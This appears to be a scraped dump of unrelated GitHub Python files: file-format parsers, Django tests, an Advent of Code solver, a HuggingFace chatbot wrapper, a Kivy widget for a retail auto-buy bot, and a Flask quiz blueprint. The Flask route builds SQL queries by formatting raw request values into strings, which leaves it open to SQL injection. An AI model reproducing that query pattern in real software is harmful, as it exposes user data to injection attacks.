size):\n i = start\n keyword = []\n text = []\n \n while not ptd == '\\0':\n ptd, i = getChar(file, i)\n keyword.append(ptd)\n keyword = ''.join(keyword)\n print('關鍵字:', keyword)\n \n return start + size + 4\n\ndef itxt(file, start, size):\n i = start\n keyword = []\n lang = []\n \n while not ptd == '\\0':\n ptd, i = getChar(file, i)\n keyword.append(ptd)\n keyword = ''.join(keyword)\n print('關鍵字:', keyword)\n \n i = i + 2 # Skip 2-byte parameter\n \n while not ptd == '\\0':\n ptd, i = getChar(file, i)\n lang.append(ptd)\n lang = ''.join(lang)\n print('語言:', lang)\n \n return start + size + 4\n\ndef phys(file, start, size):\n i = start\n \n ptd, i = getBigInt(file, i)\n print('X軸每單位像素數:', ptd)\n \n ptd, i = getBigInt(file, i)\n print('Y軸每單位像素數:', ptd)\n \n unit_type = {0: '未知(長寬比)', 1: '公制'}\n ptd, i = getBigByte(file, i)\n print('單位:', unit_type[ptd], '({})'.format(ptd))\n \n i = i + 4 # Skip 4-byte CRC\n \n return i\n\ndef time(file, start, size):\n i = start\n \n year, i = getBigShort(file, i)\n month, i = getBigByte(file, i)\n day, i = getBigByte(file, i)\n hour, i = getBigByte(file, i)\n minute, i = getBigByte(file, i)\n second, i = getBigByte(file, i)\n print('時間:',\n '{}-{}-{} {}:{}:{}'.format(year, month, day, hour, minute, second))\n \n i = i + 4 # Skip 4-byte CRC\n \n return i\n\ndef otherChunk(file, start, size):\n return start + size + 4","repo_name":"andymememe/FileFormatInfo","sub_path":"util/png_util.py","file_name":"png_util.py","file_ext":"py","file_size_in_byte":4816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"17519109577","text":"# Task 4\n# Custom exception\n# Create your custom exception named `CustomException`,\n# you can inherit from base Exception class,\n# but extend its functionality to log every error message\n# to a file named `logs.txt`.\n# Tips: Use __init__ method to extend functionality for saving messages to file\n\nclass CustomException(Exception):\n def __init__(self, msg):\n if msg:\n self.message = msg\n with open(r\"my_file.txt\", 'w') as hello_file:\n hello_file.write(self.message)\n else:\n self.message = None\n\n def __str__(self):\n print(self.message)\n if self.message:\n return 'MyError, {0} '.format(self.message)\n else:\n return 'MyError has been raised'\n\n\nraise CustomException('We have a problem!')\n\n\n\n","repo_name":"InnaOrtman/homework","sub_path":"урок 11/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14457849230","text":"from django.test import TestCase, Client\nfrom django.contrib.auth import get_user_model\nfrom ..models import Post, Group, Comment, Follow\nfrom http import HTTPStatus\nfrom django.core.cache import cache\n\nUser = get_user_model()\n\n\nclass PostURLTests(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.author = User.objects.create_user(username=\"author\")\n cls.user = User.objects.create_user(username=\"user\")\n cls.group = Group.objects.create(\n title=\"Тестовая группа\",\n slug=\"test-slug\",\n description=\"Тестовое описание\",\n )\n cls.post = Post.objects.create(\n author=cls.author,\n text=\"Тестовый пост\",\n group=cls.group,\n )\n cls.comment = Comment.objects.create(\n post=cls.post,\n author=cls.user,\n text=\"Тестовый комментарий\",\n )\n cls.follow = Follow.objects.create(\n user=cls.user,\n author=cls.author,\n )\n\n def setUp(self):\n self.guest_client = Client()\n self.authorized_client = Client()\n self.author_client = Client()\n self.authorized_client.force_login(self.user)\n self.author_client.force_login(PostURLTests.post.author)\n cache.clear()\n\n def test_guest_client_urls_status_code(self):\n \"\"\"Проверка status_code для неавторизованного пользователя\"\"\"\n url_code = {\n \"/\": HTTPStatus.OK,\n f\"/group/{PostURLTests.post.group.slug}/\": HTTPStatus.OK,\n f\"/profile/{PostURLTests.user}/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/edit/\": HTTPStatus.FOUND,\n f\"/posts/{PostURLTests.post.id}/comment/\": HTTPStatus.FOUND,\n f\"/profile/{PostURLTests.user}/follow/\": HTTPStatus.FOUND,\n f\"/profile/{PostURLTests.user}/unfollow/\": HTTPStatus.FOUND,\n \"/follow/\": HTTPStatus.FOUND,\n \"/create/\": HTTPStatus.FOUND,\n \"/unexisting_page/\": HTTPStatus.NOT_FOUND,\n }\n for url, code in url_code.items():\n with self.subTest(url=url):\n response = self.guest_client.get(url)\n self.assertEqual(response.status_code, code)\n\n def test_authorized_client_urls_status_code(self):\n \"\"\"Проверка status_code для авторизованного пользователя\"\"\"\n url_code = {\n \"/\": HTTPStatus.OK,\n f\"/group/{PostURLTests.post.group.slug}/\": HTTPStatus.OK,\n f\"/profile/{PostURLTests.user}/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/edit/\": HTTPStatus.FOUND,\n f\"/posts/{PostURLTests.post.id}/comment/\": HTTPStatus.FOUND,\n f\"/profile/{PostURLTests.author}/follow/\": HTTPStatus.FOUND,\n f\"/profile/{PostURLTests.author}/unfollow/\": HTTPStatus.FOUND,\n \"/follow/\": HTTPStatus.OK,\n \"/create/\": HTTPStatus.OK,\n \"/unexisting_page/\": HTTPStatus.NOT_FOUND,\n }\n for url, code in url_code.items():\n with self.subTest(url=url):\n response = self.authorized_client.get(url)\n self.assertEqual(response.status_code, code)\n\n def test_author_client_urls_status_code(self):\n \"\"\"Проверка status_code для автора поста\"\"\"\n url_code = {\n \"/\": HTTPStatus.OK,\n f\"/group/{PostURLTests.post.group.slug}/\": HTTPStatus.OK,\n f\"/profile/{PostURLTests.user}/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/edit/\": HTTPStatus.OK,\n f\"/posts/{PostURLTests.post.id}/comment/\": HTTPStatus.FOUND,\n f\"/profile/{PostURLTests.author}/follow/\": HTTPStatus.FOUND,\n f\"/profile/{PostURLTests.author}/unfollow/\": HTTPStatus.NOT_FOUND,\n \"/follow/\": HTTPStatus.OK,\n \"/create/\": HTTPStatus.OK,\n \"/unexisting_page/\": HTTPStatus.NOT_FOUND,\n }\n for url, code in url_code.items():\n with self.subTest(url=url):\n response = self.author_client.get(url)\n self.assertEqual(response.status_code, code)\n\n def test_urls_uses_correct_template(self):\n \"\"\"Проверка на соответствие URL-адресса и шаблона\"\"\"\n url_template = {\n \"/\": \"posts/index.html\",\n f\"/group/{PostURLTests.post.group.slug}/\": \"posts/group_list.html\",\n f\"/profile/{PostURLTests.user}/\": \"posts/profile.html\",\n f\"/posts/{PostURLTests.post.id}/\": \"posts/post_detail.html\",\n f\"/posts/{PostURLTests.post.id}/edit/\": \"posts/create_post.html\",\n \"/follow/\": \"posts/follow.html\",\n \"/create/\": \"posts/create_post.html\",\n }\n for url, template in url_template.items():\n with self.subTest(url=url):\n response = self.author_client.get(url)\n self.assertTemplateUsed(response, template)\n","repo_name":"frajik/hw05_final","sub_path":"yatube/posts/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":5280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"23375395513","text":"import re\nfrom typing import List, Tuple\n\n\nRegisters = List[int]\n\n\ndef addr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] + registers[b]\n return new_registers\n\n\ndef addi(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] + b\n return new_registers\n\n\ndef mulr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] * registers[b]\n return new_registers\n\n\ndef muli(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] * b\n return new_registers\n\n\ndef banr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] & registers[b]\n return new_registers\n\n\ndef bani(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] & b\n return new_registers\n\n\ndef borr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] | registers[b]\n return new_registers\n\n\ndef bori(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a] | b\n return new_registers\n\n\ndef setr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = registers[a]\n return new_registers\n\n\ndef seti(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = a\n return new_registers\n\n\ndef gtir(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if a > registers[b] else 0\n return new_registers\n\n\ndef gtri(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if registers[a] > b else 0\n return new_registers\n\n\ndef gtrr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if registers[a] > registers[b] else 0\n return new_registers\n\n\ndef eqir(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if a == registers[b] else 0\n return new_registers\n\n\ndef eqri(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if registers[a] == b else 0\n return new_registers\n\n\ndef eqrr(registers: Registers, a, b, c):\n new_registers = registers[:]\n new_registers[c] = 1 if registers[a] == registers[b] else 0\n return new_registers\n\n\noperations = [addr, addi, mulr, muli, banr, bani, borr, bori, setr, seti, gtir, gtri, gtrr, eqir, eqri, eqrr]\n\n\ndef get_cpu_operations(input_text: str) -> Tuple[List[List[int]], List[List[int]]]:\n cpu_operations = []\n before_operation = None\n operation = None\n after_operation = None\n\n part_2_operations = []\n for line in input_text.splitlines():\n if line.startswith('Before: '):\n m = re.search(r'Before: .*\\[(.*), (.*), (.*), (.*)\\]', line)\n before_operation = [int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))]\n elif line.startswith('After: '):\n m = re.search(r'After: .*\\[(.*), (.*), (.*), (.*)\\]', line)\n after_operation = [int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))]\n cpu_operations.append((before_operation, operation, after_operation))\n before_operation = None\n elif line:\n operation = list(map(int, line.split()))\n if not before_operation:\n part_2_operations.append(operation)\n\n return cpu_operations, part_2_operations\n\n\ndef get_operator_map(cpu_operations):\n operator_map = {}\n\n for x in range(16):\n operator_map[x] = operations[:]\n\n for before, instruction, after in cpu_operations:\n passed = 0\n instruction_index = instruction[0]\n for operation in operator_map[instruction_index][:]:\n if operation(before, *instruction[1:]) != after:\n operator_map[instruction_index].remove(operation)\n\n removed_operator = set()\n removed_operator_in_loop = True\n\n while removed_operator_in_loop:\n removed_operator_in_loop = False\n for x in range(16):\n ops = operator_map[x]\n if len(ops) == 1 and x not in removed_operator:\n removed_operator.add(x)\n removed_operator_in_loop = True\n for y in range(16):\n if y == x:\n continue\n if ops[0] in operator_map[y]:\n operator_map[y].remove(ops[0])\n continue\n\n return {k: v[0] for k, v in operator_map.items()}\n\n\ndef get_answer(input_text: str) -> int:\n cpu_operations, part_2_operations = get_cpu_operations(input_text)\n operator_map = get_operator_map(cpu_operations)\n total_passed_multi = 0\n registers = [0, 0, 0, 0]\n for cpu_operation in part_2_operations:\n instruction = cpu_operation[0]\n registers = operator_map[instruction](registers, *cpu_operation[1:])\n\n return registers[0]\n\n\ndef main():\n with open('input.txt') as input_file:\n input_text = input_file.read().rstrip('\\n')\n print(get_answer(input_text))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"rob256/adventofcode2018","sub_path":"python3/day_16/day_16_part_2.py","file_name":"day_16_part_2.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16467749972","text":"import Constants as const\n''' This program will read a number from a stream and\n after capturing the number return the rest of it'''\ndef lex_numbers(stream):\n json_number = ''\n\n number_characters = [str(d) for d in range(0,10)] + ['-','e','.']\n\n for c in stream:\n if c in number_characters:\n json_number += c\n else:\n break\n rest = stream[len(json_number):]\n\n if not len(json_number):\n return None,stream\n if '.' in json_number:\n return float(json_number),rest\n \n return int(json_number),rest\n\n'''This program will look for a string in the stream else\n returns the whole stream back'''\ndef lex_string(stream):\n json_string = ''\n if stream[0] == const.DOUBLE_QUOTE:\n ''' if the first character is a quote then definitely a string follows\n and we will discard the quote and move ahead with capturing th string\n by running through a loop until we get one unquote/quote '''\n stream = stream[1:]\n else:\n # else we return empty character and the stream back to the calling method\n return json_string,stream\n\n # we will loop through to cature all strings until we find unquote/quote\n for c in stream:\n if c == const.DOUBLE_UNQUOTE:\n return json_string,stream[len(json_string)+1:]\n else:\n json_string += c\n\n'''This program is a lexer which will take json stream and\n tokenize all the elements and create a liner list'''\n\ndef lex(stream):\n tokens = []\n\n while len(stream):\n json_string,stream = lex_string(stream)\n if json_string is not '':\n tokens.append(json_string)\n continue\n\n json_number,stream = lex_numbers(stream)\n if json_number is not None:\n tokens.append(json_number)\n continue\n\n if stream[0] in const.JSON_WHITESPACE:\n stream = stream[1:]\n\n elif stream[0] in const.JSON_SYNTAX:\n tokens.append(stream[0])\n stream = stream[1:]\n else:\n raise Exception('Unexpected character: {}'.format(stream[0]))\n return tokens\n\nprint(lex(\"{\\\"name\\\":\\\"Khitish\\\",\\\"age\\\":25,\\\"phone\\\":\\\"+919234567891\\\"}\"))","repo_name":"kkrath/jsonparser","sub_path":"lexer.py","file_name":"lexer.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"13565697365","text":"\"\"\"\r\n\r\n\r\nBe sure to run these pip installation:\r\n pip install transformers\r\n pip install torch 2.0.1+cpu # Needed to support ChatBot.let_model()\r\n Alaternatively, to use a GPU:\r\n pip install torch==1.9.0+cu111 -f https://download.pytorch.org/whl/torch_stable.html\r\n\r\n\r\n\"\"\"\r\nimport os\r\nimport subprocess\r\nimport sys\r\nfrom pathlib import Path\r\nimport warnings\r\n\r\n\r\nimport transformers # \"pip install transformers\"\r\nimport torch \r\n\r\n\r\ndefault_model_name: str = 'google/flan-t5-xl'\r\n# default_model_name: str = 'google/flan-t5-base'\r\n\r\n\r\nclass ChatBot:\r\n def __init__(self, update_transformers_lib: bool = False,\r\n set_environ_variables: bool = False,\r\n model_name: str = default_model_name,\r\n max_new_tokens: int = 4096,\r\n force_cpu: bool = False,\r\n ):\r\n self.import_transformers_lib()\r\n if update_transformers_lib:\r\n self.update_transformers_lib()\r\n if set_environ_variables:\r\n self.set_environment_variables_for_offline_training()\r\n self._model_name = model_name\r\n self.max_new_tokens = max_new_tokens\r\n self._tokenizer = None\r\n self.let_tokenizer(overwrite_tokenizer=True)\r\n self._model = None\r\n self._force_cpu = force_cpu\r\n self._device = None\r\n self.let_model(model=self._model, overwrite_model=True)\r\n\r\n def import_transformers_lib(self, lib_name: str = 'transformers'):\r\n \"\"\"\r\n Pip install the transformers library from HUGGINGFACE. This library allows you to install transformers.\r\n For help, see https://huggingface.co/docs/transformers/installation#install-with-pip\r\n\r\n :param lib_name: The name of the library to install. Options include:\r\n transformers, tokenizers, and datasets.\r\n transformers: 'transformers', 'transformers[torch]', 'transformers[tf-cpu]', 'transformers[flax]'\r\n :return: True if the update was successful, False otherwise.\r\n \"\"\"\r\n try:\r\n import transformers\r\n except ModuleNotFoundError:\r\n subprocess.check_call(f\"pip install {lib_name}\")\r\n import transformers\r\n return True\r\n\r\n def update_transformers_lib(self, transformers_subfolder: str = 'transformers'):\r\n \"\"\"\r\n Update transformers via git pull\r\n For help, see https://huggingface.co/docs/transformers/installation#install-with-pip\r\n\r\n :param transformers_subfolder: The name of the library to install. Options include:\r\n transformers, tokenizers, and datasets.\r\n transformers: 'transformers', 'transformers[torch]', 'transformers[tf-cpu]', 'transformers[flax]'\r\n \"\"\"\r\n # change directories to the path to the folder for this python file using pathlib.Path\r\n __folder__ = Path(os.path.dirname(os.path.abspath(__file__))).absolute()\r\n os.chdir(__folder__)\r\n # change to transformers_folder subdirectory of here.\r\n transformers_subfolder = os.path.join(__folder__, transformers_subfolder)\r\n os.chdir(transformers_subfolder)\r\n # check if the folder exists\r\n assert os.path.exists(transformers_subfolder), \\\r\n f'git pull failed. Folder {transformers_subfolder} does not exist.'\r\n # perform a git pull\r\n subprocess.check_call(['git', 'pull'])\r\n\r\n def set_environment_variables_for_offline_training(self, transformers_offline: int = 1,\r\n datasets_offline: int = 1):\r\n # For help: https://huggingface.co/docs/transformers/installation#offline-mode\r\n\r\n # Transformers is able to run in a firewalled or offline environment by only using local files. Set the environment variable TRANSFORMERS_OFFLINE=1 to enable this behavior.\r\n os.environ['TRANSFORMERS_OFFLINE'] = str(transformers_offline)\r\n # Add 🤗 Datasets to your offline training workflow by setting the environment variable HF_DATASETS_OFFLINE=1.\r\n os.environ['HF_DATASETS_OFFLINE'] = str(datasets_offline)\r\n\r\n # python examples/pytorch/translation/run_translation.py --model_name_or_path t5-small --dataset_name wmt16 --dataset_config ro-en ...\r\n # Run trasnslation.py\r\n\r\n @property\r\n def device(self):\r\n if self._device:\r\n return self._device\r\n elif self._force_cpu:\r\n self._device = 'cpu'\r\n else:\r\n self._device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n return self._device\r\n\r\n def let_tokenizer(self, overwrite_tokenizer: bool = False):\r\n \"\"\"\r\n Retrieves an AutoTokenizer from the transformers library for the specified model.\r\n\r\n :param overwrite_tokenizer: Optional, if tokenizer was already set, overwrite it?\r\n :type overwrite_tokenizer: bool\r\n :return: The AutoTokenizer instance.\r\n :rtype: transformers.AutoTokenizer\r\n \"\"\"\r\n # From: https://www.youtube.com/watch?v=tL1zltXuHO8\r\n if not hasattr(self, 'tokenizer'):\r\n self._tokenizer = None\r\n elif self._tokenizer and not overwrite_tokenizer:\r\n # self._tokenizer already exists. Do not overwrite.\r\n return\r\n\r\n self.import_transformers_lib()\r\n\r\n self._tokenizer = transformers.AutoTokenizer.from_pretrained(self._model_name)\r\n\r\n return self._tokenizer\r\n\r\n def tokenize_prompt(self, prompt: str = 'What color is the sky?') -> list:\r\n \"\"\"\r\n Takes a prompt (str) and tokenizes it.\r\n :param prompt: A prompt/question to send to the model (i.e., the chatbot).\r\n :type prompt: str\r\n :return: The tokenized prompt (list of strings).\r\n :rtype: list\r\n \"\"\"\r\n # From: https://www.youtube.com/watch?v=tL1zltXuHO8\r\n self.let_tokenizer(overwrite_tokenizer=False)\r\n # tokens = self._tokenizer.tokenize(prompt).to(self.device)\r\n # token_ids = self._tokenizer.convert_tokens_to_ids(tokens)\r\n # return token_ids\r\n tensor = self._tokenizer(prompt, return_tensors='pt', add_special_tokens=True).to(self.device)\r\n return tensor\r\n\r\n def let_model(self, model=None, overwrite_model: bool = False):\r\n \"\"\"\r\n Takes a model (str) and tokenizes it.\r\n :param model: The name or path of the pre-trained model to use. Defaults to 'google/flan-t5-base'.\r\n :type model: str\r\n :return: The AutoModel instance.\r\n :rtype: transformers.AutoModel\"\"\"\r\n if not hasattr(self, '_model') or overwrite_model:\r\n self._model = transformers.AutoModelForSeq2SeqLM.from_pretrained(self._model_name)\r\n self._gen_config = transformers.GenerationConfig(max_new_tokens=self.max_new_tokens)\r\n self._model.to(self.device)\r\n return self._model\r\n\r\n @property\r\n def model(self):\r\n return self._model\r\n \r\n @property\r\n def model_name(self):\r\n return self._model_name\r\n\r\n def embed(self, tokens):\r\n # Add the tokenized prompt to the embeddings.\r\n if not hasattr(self, 'input_embeddings') or not self.input_embeddings:\r\n self._input_embeddings = self._model.get_input_embeddings()\r\n if tokens:\r\n if isinstance(tokens, str):\r\n tokens = self.tokenize_prompt(prompt=tokens)\r\n self.our_embeddings = self._input_embeddings(tokens['input_ids'][0])\r\n else:\r\n self.our_embeddings = self._input_embeddings\r\n\r\n def process_prompt(self, prompt: str):\r\n # In case tokenizer is not yet created:\r\n self.let_tokenizer(overwrite_tokenizer=False)\r\n # Tokenize the prompt.\r\n tokens = self.tokenize_prompt(prompt=prompt)\r\n\r\n # In case model is not yet created:\r\n self.let_model(model=self._model, overwrite_model=False)\r\n\r\n # Create output tokens tensor\r\n output_tokens = self._model.generate(**tokens, generation_config=self._gen_config)\r\n\r\n # Convert the output tokens tensor to a list of str.\r\n outputs = self._tokenizer.batch_decode(output_tokens, skip_special_tokens=True)\r\n\r\n return '\\n'.join(outputs)\r\n\r\n\r\ndef main() -> bool:\r\n \"\"\"\r\n\r\n :param install: install the transformers library\r\n :type install: bool\r\n :param update: update the transformers library\r\n :type update: bool\r\n :return: A dict of the results\r\n :rtype: dict\r\n \"\"\"\r\n chatbot = ChatBot(model_name='google/flan-t5-base')\r\n # prompt = 'What color is the sky?'\r\n # # tokenize_prompt returns a tensor of token IDs.\r\n # tokens = chatbot.tokenize_prompt(prompt=prompt)\r\n # print(prompt, tokens)\r\n # chatbot.let_model()\r\n # for line in sys.stdin:\r\n\r\n # This does not yet work. The embed method is probably the wrong approach. Need to investigate further.\r\n chatbot.embed('PJM is a company in Pennsylvania that manages the electric power grid for 13 states and D.C.')\r\n\r\n prompt = input('Enter prompt: ')\r\n while prompt.lower() not in ['e', 'exit', 'q', 'quit']:\r\n response = chatbot.process_prompt(prompt)\r\n print(response)\r\n prompt = input('Enter prompt: ')\r\n\r\n\r\nif __name__ == '__main__':\r\n result = main()\r\n\r\n","repo_name":"cadvena/GenerativeChatbot","sub_path":"custom_gpt/hug_face.py","file_name":"hug_face.py","file_ext":"py","file_size_in_byte":9257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"86363546035","text":"from kivy.app import App\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.gridlayout import GridLayout\nfrom kivy.uix.dropdown import DropDown\nfrom kivy.uix.image import AsyncImage\nfrom kivy.uix.label import Label\nfrom buy_logic.order import Order\n\nclass DisplayItem(BoxLayout):\n def __init__(self, item, driver, **kwargs):\n super(DisplayItem, self).__init__(**kwargs)\n self.item = item\n self.img = AsyncImage(source=self.item.img_src, size_hint=(1,1))\n self.img.width = 200\n self.img.height = 200\n self.name = self.item.name\n self.link = self.item.link\n self.status = self.item.status\n\n self.driver=driver\n\n self.add_widget(self.img)\n self.buy_btn = Button(text=\"Buy\", size_hint=(1,0.1))\n self.buy_btn.bind(on_press=self.buy_item)\n self.info_layout = GridLayout()\n self.info_layout.cols = 1\n self.info_layout.rows = 4\n\n #Case item has no options\n if self.item.sizes is not None:\n self.sizes = DropDown()\n for size in self.item.sizes:\n btn = Button(text=size, size_hint_y=None)\n btn.bind(on_release=lambda btn: self.sizes.select(btn.text))\n self.sizes.add_widget(btn)\n\n #set default value to item.sizes\n self.mainbutton = Button(text=self.item.sizes[0], size_hint=(1, 0.1))\n self.mainbutton.bind(on_release=self.sizes.open)\n self.sizes.bind(on_select=lambda instance, x: setattr(self.mainbutton, \"text\", x))\n self.info_layout.add_widget(self.mainbutton)\n\n self.info_label = Label(text=str(self.status), size_hint=(1,0.1), markup=True)\n self.info_layout.add_widget(self.info_label)\n if self.status is None:\n self.info_label.text = \"[color=00ff00]In Stock[/color]\"\n self.info_layout.add_widget(self.buy_btn)\n else:\n self.info_label.text = \"[color=ff0000][b][size=15]OUT OF STOCK[/size][/b][/color]\"\n\n self.add_widget(self.info_layout)\n\n def buy_item(self, instance, size=\"Medium\"):#\n tee_size = App.get_running_app().get_size()\n shorts_size = App.get_running_app().get_shorts_size()\n import threading\n thread = threading.Thread(target=Order.buy, args=(self, [tee_size, shorts_size], self.driver))\n thread.daemon = True\n thread.start()\n\n def set_driver(self, driver):\n self.driver = driver\n\n def set_status_sold_out(self, boolean):\n if boolean:\n self.info_label.text = \"[color=ff0000][b][size=15]OUT OF STOCK[/size][/b][/color]\"\n else:\n self.info_label.text = \"[color=00ff00]In Stock[/color]\"","repo_name":"Juphex/SupremeBot","sub_path":"app/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"23555856849","text":"from jinja2 import Environment, FileSystemLoader\nfrom email.mime.text import MIMEText\n\nclass Builder:\n\n def __init__(self):\n return\n\n def build_template(self, symbols, summary, articles, company_name, exchange):\n\n try:\n\n # Declare jinja2 template\n\n file_loader = FileSystemLoader('templates')\n env = Environment(loader = file_loader)\n template = env.get_template('email.html')\n\n # Build jinja2 template from /templates/email.html\n\n output = template.render (symbols = symbols, summary = summary, articles = articles, companyName = company_name, exchange = exchange)\n\n body = MIMEText(output, 'html')\n\n return body\n\n except Exception as e:\n\n # Print thrown error\n\n print(\"Error in the Builder class: \" + str(e))\n\n","repo_name":"tlemenestrel/Automated_Stock_Updates","sub_path":"template_builder.py","file_name":"template_builder.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"32684885730","text":"\"\"\"added water level to sensor readings\n\nRevision ID: 951de0bf9891\nRevises: 9b4c6ff76b5e\nCreate Date: 2019-05-19 17:46:36.215469\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '951de0bf9891'\ndown_revision = '9b4c6ff76b5e'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('dht_sensor_readings', sa.Column('water_level', sa.Integer(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('dht_sensor_readings', 'water_level')\n # ### end Alembic commands ###\n","repo_name":"tohir87/sdp","sub_path":"migrations/versions/951de0bf9891_added_water_level_to_sensor_readings.py","file_name":"951de0bf9891_added_water_level_to_sensor_readings.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9340874733","text":"from flask import Blueprint, render_template, redirect, url_for, request, session, g\nfrom ..db import WebProject, exp_manager\nfrom markupsafe import Markup\nimport json\n\nbp = Blueprint('quest', __name__, url_prefix='/quest')\nwp = WebProject.instance()\nem = exp_manager.instance()\n\n@bp.route('/')\ndef quest_list():\n category_data = {}\n category_data[\"list\"] = wp.send_query(\"SELECT category, COUNT(category) AS n FROM problem GROUP BY category ORDER BY category\")\n category_data[\"total\"] = wp.send_query(\"SELECT COUNT(*) AS count FROM problem\")[0][\"count\"]\n\n problem_list = wp.send_query(\"\"\"\n SELECT problem.id, problem.category, (CASE solved WHEN 1 THEN 'solved' WHEN 0 THEN 'solving' ELSE 'unsolved' END) as status \n FROM problem LEFT JOIN solving ON problem.id = solving.problem_id AND user_id='{}' \n ORDER BY problem.id\n \"\"\".format(g.user[\"user_id\"]))\n return render_template('main/quest_list.html', category_data = category_data, problem_list = problem_list)\n\n@bp.route('/', methods=['GET', 'POST'])\ndef problem_show(problem_id):\n if(request.method == \"POST\"):\n send = {}\n if(em.can_exp(g.user[\"user_id\"], \"quest_solve\")):\n send[\"can_exp\"] = True\n params = request.get_json()\n\n result = wp.send_query(\"SELECT CASE WHEN answer = '{}' THEN TRUE ELSE FALSE END AS success FROM {} WHERE id = {}\".format(params[\"answer\"], params[\"type\"], params[\"problem_id\"]))\n\n is_exist = wp.send_query(\"SELECT EXISTS (SELECT * FROM solving WHERE user_id = '{}' AND problem_id = {}) as success\".format(g.user[\"user_id\"], params[\"problem_id\"]))\n\n if(is_exist[0][\"success\"]):\n wp.send_query(\"UPDATE solving SET solved = {} WHERE user_id = '{}' AND problem_id = {}\".format(result[0][\"success\"], g.user[\"user_id\"], params[\"problem_id\"]), commit=True)\n else:\n wp.send_query(\"INSERT INTO solving(solved, user_id, problem_id) VALUES ('{}', '{}', {})\".format(result[0][\"success\"], g.user[\"user_id\"], params[\"problem_id\"]), commit=True)\n \n send[\"success\"] = result[0][\"success\"]\n if(send[\"success\"]):\n send[\"exp\"] = em.exp_dict[\"quest_solve\"]\n em.gain_exp(g.user[\"user_id\"], \"quest_solve\")\n else:\n send[\"exp\"] = 0\n\n else:\n send[\"can_exp\"] = False\n send[\"success\"] = 0\n send[\"exp\"] = 0\n \n return json.dumps(send)\n\n \n problem_data = {}\n\n problem_data[\"status\"] = wp.send_query(\"\"\"\n SELECT (CASE solved WHEN 1 THEN 'solved' WHEN 0 THEN 'solving' ELSE 'unsolved' END) as status \n FROM problem LEFT JOIN solving ON problem.id = solving.problem_id AND user_id = '{}' WHERE id = '{}'\n \"\"\".format(g.user[\"user_id\"], problem_id))[0][\"status\"]\n\n problem_type = wp.send_query(\"SELECT type FROM problem WHERE id = {0}\".format(problem_id))[0][\"type\"]\n if(problem_type==\"객관식\"):\n sql = \"SELECT problem.*, objective.choices, objective.answer FROM problem INNER JOIN objective ON problem.id = objective.id WHERE problem.id = {}\".format(problem_id)\n else:\n sql = \"SELECT problem.*, subjective.answer FROM problem INNER JOIN subjective ON problem.id = subjective.id WHERE problem.id = {}\".format(problem_id)\n \n problem_data[\"problem\"] = wp.send_query(sql)[0]\n\n print(problem_data[\"problem\"])\n\n for key, val in problem_data[\"problem\"].items():\n if(type(val)==str):\n val = val.replace(\"\\'\\'\", \"\\'\")\n val = val.replace(\"\\\"\\\"\", \"\\\"\")\n problem_data[\"problem\"][key] = val\n \n # problem_data[\"problem\"][\"content\"] = problem_data[\"problem\"][\"content\"].replace(\"\\n\", \"
\")\n # problem_data[\"problem\"][\"explanation\"] = problem_data[\"problem\"][\"explanation\"].replace(\"\\n\", \"
